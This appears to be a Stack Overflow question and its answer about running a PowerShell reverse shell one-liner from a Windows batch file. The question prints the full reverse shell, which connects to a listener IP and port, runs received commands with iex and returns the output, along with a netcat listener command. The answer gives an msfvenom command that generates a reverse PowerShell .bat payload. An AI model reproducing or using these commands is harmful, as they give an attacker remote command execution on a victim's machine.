0

I'm trying to run the below reverse shell PowerShell command using a .bat file.

powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"

First, I start the netcat listener in Kali:

nc -vv -l -p 4777

I then run the PowerShell command, but I get the following error in Windows 10:

    At line:1 char:112
    + ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
    +                                                                 ~
    Unexpected token ')' in expression or statement.
    At line:1 char:160
    + ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
    +                                                                 ~
    Unexpected token '}' in expression or statement.
        + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken

I've tried many possible ', " and ``` combinations and variations, both in and encasing the command. I'm totally stumped.

vskbdvds
  • 163
  • 2
  • 2
  • 7
  • 1
    Can you please help us? I suggest you to expand your PowerShell code and write it in a `ps1` file. Is it working? If not, then this is not a batch file problem! – double-beep Jan 10 '19 at 13:19
  • Is it possible it is an extra semi-colon after the opening bracket of the while loop? The first error seems to indicate the $x variable is not resolving correctly. That could be an additional syntax issue? – Jansen McEntee Jan 10 '19 at 14:27
  • If you want to combine batch and powershell in one file you might want to look at this: https://ss64.org/viewtopic.php?pid=9859#p9859 – npocmaka Jan 10 '19 at 15:11

1 Answers1

1

Found myself into the same problem. I wonder why a command that runs without errors in CMD doesn't work well if it's executed inside a .bat file. I doesn't make sense at all.

Metasploit is our friend here:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Source: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

tamariz189
  • 11
  • 2